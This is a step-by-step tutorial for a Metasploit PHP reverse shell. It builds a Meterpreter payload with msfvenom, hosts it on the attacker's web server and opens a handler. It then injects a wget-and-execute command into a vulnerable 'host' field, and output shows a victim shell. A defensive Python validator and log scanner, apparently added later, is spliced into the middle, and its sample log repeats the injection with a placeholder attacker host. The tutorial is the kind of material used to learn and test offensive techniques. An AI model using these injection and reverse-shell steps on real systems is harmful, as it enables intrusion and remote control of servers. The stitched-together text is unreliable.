Metasploit PHP reverse shell reference

Create shell with msfvenom

Let’s exploit this vulnerability to download a PHP reverse shell. But first, create the shell with msfvenom:

root@bt:~# msfvenom -p php/meterpreter/reverse_tcp -f raw lhost= lport=4050 > /var/www/shell.txt
root@bt:~# head /var/www/shell.txt

# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '';
$port = 4050;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {

As you can see, the first line (the opening PHP tag) is commented out. Let’s uncomment it:

root@bt:~# sed -i 's/#<?php/<?php/' /var/www/shell.txt

Start web server on attacker’s machine

Although it would be possible to host our PHP shell on a third party, it’s convenient in our tutorial to host it from the attacker’s machine directly. Let’s start our web server:

root@bt:~# service apache2 start
 * Starting web server apache2              [ OK ]

Start listening on port 4050 from attacker’s machine

From BT5, let’s open our listener:

root@bt:~# msfconsole
msf > use multi/handler
msf  exploit(handler) > set payload php/meterpreter/reverse_tcp
msf  exploit(handler) > set lhost
msf  exploit(handler) > set lport 4050
msf  exploit(handler) > exploit

[*] Started reverse handler on 
[*] Starting the payload handler...

Download shell from the vulnerable host

Let’s exploit the vulnerability and download our shell from the attacker’s web server. Enter the following command in the “host” field:

;wget -O /tmp/shell.php;php -f /tmp/shell.php

The above command downloads shell.txt as shell.php into the /tmp directory and then executes the PHP shell (php -f /tmp/shell.php).
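Seen from the defender's side, the request above is easy to reject and easy to spot. The following Python code is an added example, not part of the original post: it applies an allow-list check to the “host” field and flags logged requests that carry the download-and-execute pattern. The query parameter name, the /ping.php path, the log lines and attacker.example are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

PARAM = "host"  # assumption: the form field arrives as a query parameter named "host"
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME = re.compile(rf"{LABEL}(?:\.{LABEL})*")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r"[;|&`$<>\n]")
# A fetch tool followed by the PHP CLI running a file, as in the command above.
FETCH_EXEC = re.compile(r"\b(?:wget|curl)\b.*\bphp\b\s+(?:-f\s+)?\S+", re.S)

# Constructed sample access log; the path, addresses and URL are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/May/2012:20:58:01 -0400] "GET /ping.php?host=www.example.org HTTP/1.1" 200 512',
    '192.0.2.10 - - [05/May/2012:20:58:09 -0400] "GET /ping.php?host=198.51.100.7 HTTP/1.1" 200 498',
    '203.0.113.5 - - [05/May/2012:21:02:30 -0400] "GET /ping.php?host=%3Bwget%20http%3A%2F%2F'
    'attacker.example%2Fshell.txt%20-O%20%2Ftmp%2Fshell.php%3Bphp%20-f%20%2Ftmp%2Fshell.php HTTP/1.1" 200 0',
]

def is_valid_host(value):
    """Allow-list check for the field: an IP address or a DNS hostname only."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return len(value) <= 253 and HOSTNAME.fullmatch(value) is not None

def classify(value):
    """Label one decoded field value."""
    if is_valid_host(value):
        return "ok"
    if SHELL_META.search(value):
        return "download-and-execute" if FETCH_EXEC.search(value) else "shell-metacharacters"
    return "invalid-host"

def scan(log_lines):
    """Return (client, verdict, decoded value) for each request that fails the check."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            verdict = classify(value)
            if verdict != "ok":
                hits.append((line.split()[0], verdict, value))
    return hits
```

Running the same is_valid_host check in the application before the value reaches any shell command is the fix; scan(SAMPLE_LOG) is the detection side for requests that were already served.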

Test the reverse shell

Now we have a Meterpreter session:

[*] Sending stage (38791 bytes) to
[*] Meterpreter session 1 opened ( -> at 2012-05-05 21:02:34 -0400

meterpreter > sysinfo
Computer    : snort
OS          : Linux snort 2.6.32-5-686 #1 SMP Mon Jan 16 16:04:25 UTC 2012 i686
Meterpreter : php/php
meterpreter > shell
Process 3845 created.
Channel 0 created.
eth0      Link encap:Ethernet  HWaddr 00:0c:29:97:32:0f  
          inet addr:  Bcast:  Mask:
          inet6 addr: fe80::20c:29ff:fe97:320f/64 Scope:Link
          RX packets:530 errors:0 dropped:0 overruns:0 frame:0
          TX packets:285 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:62923 (61.4 KiB)  TX bytes:31150 (30.4 KiB)
          Interrupt:19 Base address:0x2000



Author: SK,Seo
